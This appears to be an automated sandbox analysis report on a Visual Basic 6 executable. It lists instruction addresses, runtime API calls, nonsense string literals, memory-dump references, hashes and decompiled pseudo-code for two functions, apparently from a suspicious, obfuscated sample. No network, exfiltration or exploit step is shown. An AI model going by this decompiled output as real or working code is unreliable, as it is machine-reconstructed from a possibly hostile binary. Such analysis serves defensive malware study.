0x0041fcea
0x0041fd09
0x0041fcec
0x0041fcec
0x0041fcf1
0x0041fcf6
0x0041fcf9
0x0041fcfc
0x0041fd01
0x0041fd01
0x0041fd13
0x0041fd19
0x0041fd26
0x0041fd2e
0x0041fd2e
0x0041fd36
0x0041fd37
0x0041fd3c
0x0041fd43
0x0041fd4d
0x0041fd4e
0x0041fd51
0x0041fd52
0x0041fd57
0x0041fd5e
0x0041fd69
0x0041fd76
0x0041fd93
0x0041fd78
0x0041fd78
0x0041fd7d
0x0041fd82
0x0041fd87
0x0041fd87
0x0041fdb7
0x0041fdbb
0x0041fdc0
0x0041fdcf
0x0041fdd5
0x0041fdd7
0x0041fdde
0x0041fdfd
0x0041fde0
0x0041fde0
0x0041fde5
0x0041fdea
0x0041fded
0x0041fdf0
0x0041fdf5
0x0041fdf5
0x0041fe04
0x0041fe07
0x0041fe0c
0x0041fe16
0x0041fe1b
0x0041fe1c
0x0041fe1f
0x0041fe29
0x0041fe31
0x0041fe35
0x0041fe36
0x0041fe38
0x0041fe3d
0x0041fe43
0x0041fe48
0x0041fe4d
0x0041fe57
0x0041fe57
0x0041fe5f
0x0041fe60
0x0041fe65
0x0041fe68
0x0041fe69
0x0041fe78
0x0041fe7f
0x0041fe8a
0x0041fe97
0x0041feb4
0x0041fe99
0x0041fe99
0x0041fe9e
0x0041fea3
0x0041fea8
0x0041fea8
0x0041fed8
0x0041fedc
0x0041fee1
0x0041fef0
0x0041fef6
0x0041fef8
0x0041feff
0x0041ff1e
0x0041ff01
0x0041ff01
0x0041ff06
0x0041ff0b
0x0041ff0e
0x0041ff11
0x0041ff16
0x0041ff16
0x0041ff28
0x0041ff2e
0x0041ff38
0x0041ff3b
0x0041ff42
0x0041ff4a
0x0041ff4e
0x0041ff4f
0x0041ff57
0x0041ff58
0x0041ff62
0x0041ff6a
0x0041ff72
0x0041ff76
0x0041ff77
0x0041ff79
0x0041ff88
0x0041ffa5
0x0041ff8a
0x0041ff8a
0x0041ff8f
0x0041ff94
0x0041ff99
0x0041ff99
0x0041ffb7
0x0041ffc6
0x0041ffc9
0x0041ffcb
0x0041ffd2
0x0041ffee
0x0041ffd4
0x0041ffd4
0x0041ffd6
0x0041ffdb
0x0041ffde
0x0041ffe1
0x0041ffe6
0x0041ffe6
0x0041fff8
0x00420007
0x0042000d
0x0042000f
0x00420016
0x00420035
0x00420018
0x00420018
0x0042001d
0x00420022
0x00420025
0x00420028
0x0042002d
0x0042002d
0x0042003f
0x00420045
0x00420052
0x0042005a
0x0042005a
0x00420066
0x00420083
0x00420068
0x00420068
0x0042006d
0x00420072
0x00420077
0x00420077
0x004200a7
0x004200ab
0x004200b0
0x004200bf
0x004200c5
0x004200c7
0x004200ce
0x004200ed
0x004200d0
0x004200d0
0x004200d5
0x004200da
0x004200dd
0x004200e0
0x004200e5
0x004200e5
0x004200f4
0x004200f7
0x004200fd
0x0042010a
0x00420112
0x00420117
0x00420118
0x00420161
0x00420169
0x00420171
0x00420179
0x00420181
0x00420189
0x0042018e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041FBFB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041FC13
#593.MSVBVM60(0000000A), ref: 0041FC45
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041FC50
__vbaNew2.MSVBVM60(00403C68,004223FC,0000000A), ref: 0041FC68
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 0041FCB5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,000000D0), ref: 0041FCFC
__vbaStrMove.MSVBVM60(00000000,?,00403C78,000000D0), ref: 0041FD26
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,000000D0), ref: 0041FD2E
#670.MSVBVM60(?,?,?,?,?,00401356), ref: 0041FD37
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041FD52
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041FD5E
__vbaNew2.MSVBVM60(00403270,00422010,00008008,?), ref: 0041FD82
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FDBB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000150), ref: 0041FDF0
__vbaStrCat.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FE0C
__vbaStrMove.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FE16
__vbaStrCat.MSVBVM60(?,00000000,cheve,?), ref: 0041FE1F
__vbaStrMove.MSVBVM60(?,00000000,cheve,?), ref: 0041FE29
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,cheve,?), ref: 0041FE38
__vbaFreeObj.MSVBVM60(?,?,00401356), ref: 0041FE43
#525.MSVBVM60(000000A9,?,?,00401356), ref: 0041FE4D
__vbaStrMove.MSVBVM60(000000A9,?,?,00401356), ref: 0041FE57
#610.MSVBVM60(?,00008008,?), ref: 0041FE60
#557.MSVBVM60(?,?,00008008,?), ref: 0041FE69
__vbaFreeVar.MSVBVM60(?,?,00008008,?), ref: 0041FE7F
__vbaNew2.MSVBVM60(00403270,00422010,?,?,00008008,?), ref: 0041FEA3
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FEDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000110), ref: 0041FF11
#515.MSVBVM60(?,00000008,000000BF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FF4F
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FF58
__vbaStrMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FF62
__vbaFreeObj.MSVBVM60(?,?,00000008,000000BF), ref: 0041FF6A
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000BF), ref: 0041FF79
__vbaNew2.MSVBVM60(00403C68,004223FC,?,?,00401356), ref: 0041FF94
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 0041FFE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,000000F8), ref: 00420028
__vbaStrMove.MSVBVM60(00000000,?,00403C78,000000F8), ref: 00420052
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,000000F8), ref: 0042005A
__vbaNew2.MSVBVM60(00403270,00422010,?,?,00008008,?), ref: 00420072
__vbaObjSet.MSVBVM60(?,00000000), ref: 004200AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000000A0), ref: 004200E0
__vbaStrMove.MSVBVM60(00000000,?,00403C88,000000A0), ref: 0042010A
__vbaFreeObj.MSVBVM60(00000000,?,00403C88,000000A0), ref: 00420112
__vbaFreeStr.MSVBVM60(0042018F), ref: 00420161
__vbaFreeStr.MSVBVM60(0042018F), ref: 00420169

Strings

skuddermudderets, xrefs: 0041FD3C
cheve, xrefs: 0041FE07

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$New2$List$#515#525#557#593#610#670ChkstkCopy
String ID: cheve$skuddermudderets
API String ID: 4055753005-3782447816
Opcode ID: e08bda131439861faf098ee4a471c93e6fb40cfdcf8b8f6cd0be8eaca77ced67
Instruction ID: 1d58531dcfe7142c0118b120a280d80144c30386f5d2444fe5147aa57b5591c1
Opcode Fuzzy Hash: e08bda131439861faf098ee4a471c93e6fb40cfdcf8b8f6cd0be8eaca77ced67
Instruction Fuzzy Hash: E2F10971A00218AFDB10EFA5DD45BDDBBB5BF04304F20016AE506BB2A2DB785A49DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042049A, Relevance: 89.6, APIs: 41, Strings: 10, Instructions: 340
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0042049A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				short _v44;
				short _v48;
				char _v64;
				void* _v68;
				char _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v92;
				char _v108;
				char* _v132;
				char _v140;
				void* _v144;
				char _v148;
				void* _v152;
				signed int _v156;
				void* _v160;
				signed int _v164;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr* _v220;
				signed int _v224;
				char* _t173;
				signed int _t177;
				short _t183;
				signed int _t187;
				short _t191;
				char* _t192;
				signed int _t196;
				char* _t204;
				signed int _t208;
				char* _t209;
				char* _t211;
				signed int _t217;
				signed int _t222;
				signed int _t229;
				signed int _t234;
				void* _t261;
				void* _t263;
				intOrPtr _t264;
				void* _t265;

				_t264 = _t263 - 0x10;
				 *[fs:0x0] = _t264;
				L00401350();
				_v20 = _t264;
				_v16 = 0x4012b8;
				_v12 = 0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t261);
				L004014E2();
				if( *0x422010 != 0) {
					_v184 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v184 = 0x422010;
				}
				_t173 =  &_v72;
				L00401566();
				_v152 = _t173;
				_t177 =  *((intOrPtr*)( *_v152 + 0x160))(_v152,  &_v76, _t173,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x30c))( *_v184));
				asm("fclex");
				_v156 = _t177;
				if(_v156 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403cf4);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v188 = _t177;
				}
				_v180 = _v76;
				_v76 = _v76 & 0x00000000;
				_v84 = _v180;
				_v92 = 9;
				_push( &_v92);
				_push( &_v108);
				L00401452();
				_v132 = L"DADAP";
				_v140 = 0x8008;
				_push( &_v108);
				_t183 =  &_v140;
				_push(_t183);
				L00401458();
				_v160 = _t183;
				L0040156C();
				_push( &_v108);
				_push( &_v92);
				_push(2);
				L0040153C();
				_t265 = _t264 + 0xc;
				if(_v160 != 0) {
					_push(0);
					L004014E8();
					_push( &_v64);
					_push(_a4);
					_push(0x403d48);
					L0040150C();
					_t265 = _t265 + 0xc;
				}
				_v84 = 0x3830;
				_v92 = 2;
				_t187 =  &_v92;
				_push(_t187);
				L00401446();
				L00401560();
				_push(_t187);
				_push(L"Rerefief");
				L0040144C();
				asm("sbb eax, eax");
				_v152 =  ~( ~_t187 + 1);
				L00401554();
				L0040157E();
				_t191 = _v152;
				if(_t191 != 0) {
					if( *0x4223fc != 0) {
						_v192 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v192 = 0x4223fc;
					}
					_v152 =  *_v192;
					_t229 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v72);
					asm("fclex");
					_v156 = _t229;
					if(_v156 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v152);
						_push(_v156);
						L00401572();
						_v196 = _t229;
					}
					_v160 = _v72;
					_t234 =  *((intOrPtr*)( *_v160 + 0xc8))(_v160,  &_v144);
					asm("fclex");
					_v164 = _t234;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x403c78);
						_push(_v160);
						_push(_v164);
						L00401572();
						_v200 = _t234;
					}
					_t191 = _v144;
					_v44 = _t191;
					L0040156C();
					_push(L"HOLLO");
					_push(L"Regular6");
					_push(L"Azulmic");
					_push(L"bedrageriets");
					L004014B2();
				}
				L00401440();
				_t192 =  &_v72;
				L00401566();
				_v152 = _t192;
				_t196 =  *((intOrPtr*)( *_v152 + 0x1c))(_v152,  &_v148, _t192, _t191);
				asm("fclex");
				_v156 = _t196;
				if(_v156 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x403fe0);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v204 = _t196;
				}
				_v160 =  ~(0 | _v148 - 0x007560d5 >= 0x00000000);
				L0040156C();
				if(_v160 != 0) {
					_push(L"bopl");
					_push(L"Verdantly");
					L00401518();
					L00401560();
					if( *0x4223fc != 0) {
						_v208 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v208 = 0x4223fc;
					}
					_v152 =  *_v208;
					_t217 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v72);
					asm("fclex");
					_v156 = _t217;
					if(_v156 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v152);
						_push(_v156);
						L00401572();
						_v212 = _t217;
					}
					_v160 = _v72;
					_t222 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v144);
					asm("fclex");
					_v164 = _t222;
					if(_v164 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x403c78);
						_push(_v160);
						_push(_v164);
						L00401572();
						_v216 = _t222;
					}
					_v48 = _v144;
					L0040156C();
				}
				if( *0x422010 != 0) {
					_v220 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v220 = 0x422010;
				}
				_t204 =  &_v72;
				L00401566();
				_v152 = _t204;
				_t208 =  *((intOrPtr*)( *_v152 + 0x100))(_v152,  &_v76, _t204,  *((intOrPtr*)( *((intOrPtr*)( *_v220)) + 0x308))( *_v220));
				asm("fclex");
				_v156 = _t208;
				if(_v156 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x403cf4);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v224 = _t208;
				}
				_push(0);
				_push(0);
				_push(_v76);
				_t209 =  &_v92;
				_push(_t209);
				L00401500();
				_push(_t209);
				L00401506();
				_v40 = _t209;
				_push( &_v76);
				_t211 =  &_v72;
				_push(_t211);
				_push(2);
				L00401512();
				L0040157E();
				_push(0x420a70);
				L00401554();
				L00401554();
				L0040157E();
				return _t211;
			}

0x0042049d
0x004204ac
0x004204b8
0x004204c0
0x004204c3
0x004204ca
0x004204d1
0x004204e0
0x004204e9
0x004204f5
0x00420512
0x004204f7
0x004204f7
0x004204fc
0x00420501
0x00420506
0x00420506
0x00420536
0x0042053a
0x0042053f
0x00420557
0x0042055d
0x0042055f
0x0042056c
0x00420591
0x0042056e
0x0042056e
0x00420573
0x00420578
0x0042057e
0x00420584
0x00420589
0x00420589
0x0042059b
0x004205a1
0x004205ab
0x004205ae
0x004205b8
0x004205bc
0x004205bd
0x004205c2
0x004205c9
0x004205d6
0x004205d7
0x004205dd
0x004205de
0x004205e3
0x004205ed
0x004205f5
0x004205f9
0x004205fa
0x004205fc
0x00420601
0x0042060d
0x0042060f
0x00420611
0x00420619
0x0042061a
0x0042061d
0x00420622
0x00420627
0x00420627
0x0042062a
0x00420631
0x00420638
0x0042063b
0x0042063c
0x00420646
0x0042064b
0x0042064c
0x00420651
0x00420658
0x0042065d
0x00420667
0x0042066f
0x00420674
0x0042067d
0x0042068a
0x004206a7
0x0042068c
0x0042068c
0x00420691
0x00420696
0x0042069b
0x0042069b
0x004206b9
0x004206d1
0x004206d4
0x004206d6
0x004206e3
0x00420705
0x004206e5
0x004206e5
0x004206e7
0x004206ec
0x004206f2
0x004206f8
0x004206fd
0x004206fd
0x0042070f
0x0042072a
0x00420730
0x00420732
0x0042073f
0x00420764
0x00420741
0x00420741
0x00420746
0x0042074b
0x00420751
0x00420757
0x0042075c
0x0042075c
0x0042076b
0x00420772
0x00420779
0x0042077e
0x00420783
0x00420788
0x0042078d
0x00420792
0x00420792
0x00420797
0x0042079d
0x004207a1
0x004207a6
0x004207c1
0x004207c4
0x004207c6
0x004207d3
0x004207f5
0x004207d5
0x004207d5
0x004207d7
0x004207dc
0x004207e2
0x004207e8
0x004207ed
0x004207ed
0x0042080d
0x00420817
0x00420825
0x0042082b
0x00420830
0x00420835
0x0042083f
0x0042084b
0x00420868
0x0042084d
0x0042084d
0x00420852
0x00420857
0x0042085c
0x0042085c
0x0042087a
0x00420892
0x00420895
0x00420897
0x004208a4
0x004208c6
0x004208a6
0x004208a6
0x004208a8
0x004208ad
0x004208b3
0x004208b9
0x004208be
0x004208be
0x004208d0
0x004208eb
0x004208f1
0x004208f3
0x00420900
0x00420925
0x00420902
0x00420902
0x00420907
0x0042090c
0x00420912
0x00420918
0x0042091d
0x0042091d
0x00420933
0x0042093a
0x0042093a
0x00420946
0x00420963
0x00420948
0x00420948
0x0042094d
0x00420952
0x00420957
0x00420957
0x00420987
0x0042098b
0x00420990
0x004209a8
0x004209ae
0x004209b0
0x004209bd
0x004209e2
0x004209bf
0x004209bf
0x004209c4
0x004209c9
0x004209cf
0x004209d5
0x004209da
0x004209da
0x004209e9
0x004209eb
0x004209ed
0x004209f0
0x004209f3
0x004209f4
0x004209fc
0x004209fd
0x00420a02
0x00420a08
0x00420a09
0x00420a0c
0x00420a0d
0x00420a0f
0x00420a1a
0x00420a1f
0x00420a5a
0x00420a62
0x00420a6a
0x00420a6f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 004204B8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 004204E9
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 00420501
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042053A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000160), ref: 00420584
#575.MSVBVM60(?,00000009), ref: 004205BD
__vbaVarTstNe.MSVBVM60(00008008,?,?,00000009), ref: 004205DE
__vbaFreeObj.MSVBVM60(00008008,?,?,00000009), ref: 004205ED
__vbaFreeVarList.MSVBVM60(00000002,00000009,?,00008008,?,?,00000009), ref: 004205FC
__vbaOnError.MSVBVM60(00000000,?,?,00401356), ref: 00420611
__vbaPrintObj.MSVBVM60(00403D48,00000000,?,00000000,?,?,00401356), ref: 00420622
#651.MSVBVM60(00000002), ref: 0042063C
__vbaStrMove.MSVBVM60(00000002), ref: 00420646
__vbaStrCmp.MSVBVM60(Rerefief,00000000,00000002), ref: 00420651
__vbaFreeStr.MSVBVM60(Rerefief,00000000,00000002), ref: 00420667
__vbaFreeVar.MSVBVM60(Rerefief,00000000,00000002), ref: 0042066F
__vbaNew2.MSVBVM60(00403C68,004223FC,Rerefief,00000000,00000002), ref: 00420696
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 004206F8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,000000C8), ref: 00420757
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,000000C8), ref: 00420779
#690.MSVBVM60(bedrageriets,Azulmic,Regular6,HOLLO), ref: 00420792
#685.MSVBVM60(Rerefief,00000000,00000002), ref: 00420797
__vbaObjSet.MSVBVM60(?,00000000,Rerefief,00000000,00000002), ref: 004207A1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403FE0,0000001C), ref: 004207E8
__vbaFreeObj.MSVBVM60(00000000,?,00403FE0,0000001C), ref: 00420817
__vbaStrCat.MSVBVM60(Verdantly,bopl), ref: 00420835
__vbaStrMove.MSVBVM60(Verdantly,bopl), ref: 0042083F
__vbaNew2.MSVBVM60(00403C68,004223FC,Verdantly,bopl), ref: 00420857
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 004208B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000140), ref: 00420918
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,00000140), ref: 0042093A
__vbaNew2.MSVBVM60(00403270,00422010), ref: 00420952
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042098B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000100), ref: 004209D5
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 004209F4
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401356), ref: 004209FD
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420A0F
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420A1A
__vbaFreeStr.MSVBVM60(00420A70,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420A5A
__vbaFreeStr.MSVBVM60(00420A70,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420A62
__vbaFreeVar.MSVBVM60(00420A70,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420A6A

Strings

Regular6, xrefs: 00420783
HOLLO, xrefs: 0042077E
bopl, xrefs: 0042082B
08, xrefs: 0042062A
DADAP, xrefs: 004205C2
Azulmic, xrefs: 00420788
pB, xrefs: 00420A67
Verdantly, xrefs: 00420830
bedrageriets, xrefs: 0042078D
Rerefief, xrefs: 0042064C

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$ListMove$#575#651#685#690CallChkstkCopyErrorLatePrint
String ID: 08$Azulmic$DADAP$HOLLO$Regular6$Rerefief$Verdantly$bedrageriets$bopl$pB
API String ID: 2545346589-3635009846
Opcode ID: b84a39df064f2360458b750127d5347b4d2d6f49e83d39871a22583c88f3a379
Instruction ID: ac77c4c0c6714a72818067af6256f4b5860d6610c96d012ca05d16ff21f6567a
Opcode Fuzzy Hash: b84a39df064f2360458b750127d5347b4d2d6f49e83d39871a22583c88f3a379
Instruction Fuzzy Hash: EDF1FB70E00228AFDB10DFA1DD46F9DB7B4BF04305F5040AAE50AB72A2DB785A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420A97, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00420A97(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				short _v124;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				char* _t95;
				signed int _t99;
				char* _t103;
				signed int _t107;
				char* _t113;
				intOrPtr _t155;
				intOrPtr _t167;

				_t167 = __fp0;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t155;
				_push(0x7c);
				L00401350();
				_v12 = _t155;
				_v8 = 0x4012c8;
				_v96 = 0x40401c;
				_v104 = 8;
				L004014BE();
				_push( &_v72);
				_push(0x58);
				_push( &_v88);
				L0040143A();
				_push( &_v88);
				L004014DC();
				L00401560();
				_push( &_v88);
				_push( &_v72);
				_push(2);
				L0040153C();
				if( *0x422010 != 0) {
					_v132 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v132 = 0x422010;
				}
				_t95 =  &_v52;
				L00401566();
				_v108 = _t95;
				_t99 =  *((intOrPtr*)( *_v108 + 0x158))(_v108,  &_v40, _t95,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v112 = _t99;
				if(_v112 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403c88);
					_push(_v108);
					_push(_v112);
					L00401572();
					_v136 = _t99;
				}
				if( *0x422010 != 0) {
					_v140 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v140 = 0x422010;
				}
				_t103 =  &_v56;
				L00401566();
				_v116 = _t103;
				_t107 =  *((intOrPtr*)( *_v116 + 0xe8))(_v116,  &_v44, _t103,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x2fc))( *_v140));
				asm("fclex");
				_v120 = _t107;
				if(_v120 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x403c88);
					_push(_v116);
					_push(_v120);
					L00401572();
					_v144 = _t107;
				}
				_push(_v40);
				L00401530();
				L00401560();
				_push(_t107);
				_push(_v44);
				L0040144C();
				_v124 =  ~(0 | _t107 <= 0x00000000);
				_push( &_v44);
				_push( &_v48);
				_push( &_v40);
				_push(3);
				L0040151E();
				_push( &_v56);
				_push( &_v52);
				_push(2);
				L00401512();
				_t113 = _v124;
				if(_t113 != 0) {
					_v96 = L"anoperineal";
					_v104 = 8;
					L004014BE();
					_push( &_v72);
					_push( &_v88);
					L00401434();
					_push( &_v88);
					L004014DC();
					L00401560();
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L0040153C();
					_v96 = L"Subreptitiously";
					_v104 = 8;
					L004014BE();
					_push( &_v72);
					_push( &_v88);
					L0040142E();
					_push( &_v88);
					L004014DC();
					L00401560();
					_push( &_v88);
					_t113 =  &_v72;
					_push(_t113);
					_push(2);
					L0040153C();
				}
				L00401428();
				_v32 = _t167;
				asm("wait");
				_push(0x420d85);
				L00401554();
				L00401554();
				L00401554();
				return _t113;
			}

0x00420a97
0x00420a9c
0x00420aa7
0x00420aa8
0x00420aaf
0x00420ab2
0x00420aba
0x00420abd
0x00420ac4
0x00420acb
0x00420ad8
0x00420ae0
0x00420ae1
0x00420ae6
0x00420ae7
0x00420aef
0x00420af0
0x00420afa
0x00420b02
0x00420b06
0x00420b07
0x00420b09
0x00420b18
0x00420b32
0x00420b1a
0x00420b1a
0x00420b1f
0x00420b24
0x00420b29
0x00420b29
0x00420b4d
0x00420b51
0x00420b56
0x00420b65
0x00420b6b
0x00420b6d
0x00420b74
0x00420b93
0x00420b76
0x00420b76
0x00420b7b
0x00420b80
0x00420b83
0x00420b86
0x00420b8b
0x00420b8b
0x00420ba1
0x00420bbe
0x00420ba3
0x00420ba3
0x00420ba8
0x00420bad
0x00420bb2
0x00420bb2
0x00420be2
0x00420be6
0x00420beb
0x00420bfa
0x00420c00
0x00420c02
0x00420c09
0x00420c28
0x00420c0b
0x00420c0b
0x00420c10
0x00420c15
0x00420c18
0x00420c1b
0x00420c20
0x00420c20
0x00420c2f
0x00420c32
0x00420c3c
0x00420c41
0x00420c42
0x00420c45
0x00420c53
0x00420c5a
0x00420c5e
0x00420c62
0x00420c63
0x00420c65
0x00420c70
0x00420c74
0x00420c75
0x00420c77
0x00420c7f
0x00420c85
0x00420c8b
0x00420c92
0x00420c9f
0x00420ca7
0x00420cab
0x00420cac
0x00420cb4
0x00420cb5
0x00420cbf
0x00420cc7
0x00420ccb
0x00420ccc
0x00420cce
0x00420cd6
0x00420cdd
0x00420cea
0x00420cf2
0x00420cf6
0x00420cf7
0x00420cff
0x00420d00
0x00420d0a
0x00420d12
0x00420d13
0x00420d16
0x00420d17
0x00420d19
0x00420d1e
0x00420d21
0x00420d26
0x00420d29
0x00420d2a
0x00420d6f
0x00420d77
0x00420d7f
0x00420d84

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420AB2
__vbaVarDup.MSVBVM60 ref: 00420AD8
#607.MSVBVM60(?,00000058,?), ref: 00420AE7
__vbaStrVarMove.MSVBVM60(?,?,00000058,?), ref: 00420AF0
__vbaStrMove.MSVBVM60(?,?,00000058,?), ref: 00420AFA
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000058,?), ref: 00420B09
__vbaNew2.MSVBVM60(00403270,00422010), ref: 00420B24
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420B51
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000158), ref: 00420B86
__vbaNew2.MSVBVM60(00403270,00422010), ref: 00420BAD
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420BE6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000000E8), ref: 00420C1B
#517.MSVBVM60(?), ref: 00420C32
__vbaStrMove.MSVBVM60(?), ref: 00420C3C
__vbaStrCmp.MSVBVM60(?,00000000,?), ref: 00420C45
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?), ref: 00420C65
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420C77
__vbaVarDup.MSVBVM60 ref: 00420C9F
#522.MSVBVM60(?,?), ref: 00420CAC
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420CB5
__vbaStrMove.MSVBVM60(?,?,?), ref: 00420CBF
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420CCE
__vbaVarDup.MSVBVM60 ref: 00420CEA
#520.MSVBVM60(?,?), ref: 00420CF7
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420D00
__vbaStrMove.MSVBVM60(?,?,?), ref: 00420D0A
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420D19
#535.MSVBVM60 ref: 00420D21
__vbaFreeStr.MSVBVM60(00420D85), ref: 00420D6F
